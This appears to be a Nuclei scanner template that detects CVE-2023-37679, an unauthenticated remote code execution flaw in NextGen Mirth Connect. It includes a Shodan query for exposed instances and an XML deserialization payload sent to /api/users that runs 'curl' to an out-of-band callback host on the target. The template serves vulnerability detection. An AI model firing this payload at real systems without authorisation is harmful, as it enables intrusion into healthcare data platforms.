id: CVE-2023-37679 info: name: NextGen Mirth Connect - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability reference: - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 classification: cve-id: CVE-2023-37679 metadata: max-request: 2 verified: true shodan-query: title:"mirth connect administrator" tags: cve,cve2023,nextgen,rce http: - raw: - | GET /api/server/version HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI - | POST /api/users HTTP/1.1 Host: {{Hostname}} X-Requested-With: OpenAPI Content-Type: application/xml foo

java.lang.Comparable curl http://{{interactsh-url}}/ start

matchers: - type: dsl dsl: - 'compare_versions(version, "<4.4.1")' - 'contains(interactsh_protocol, "dns")' - 'status_code_1 == 200 && status_code_2 == 500' condition: and extractors: - type: regex part: body_1 name: version group: 1 regex: - '(.*)' internal: true # digest: 4a0a004730450221008e36cf08f81d2103e905d890bf31e0fc3f94f15eb231fd889a46d46d9cd7b18202205a5d3b1c4a8a0757dea7ab3b0c276c28dedc720c80d0179827f1ccaabc1fc305:922c64590222798bb761d5b6d8e72950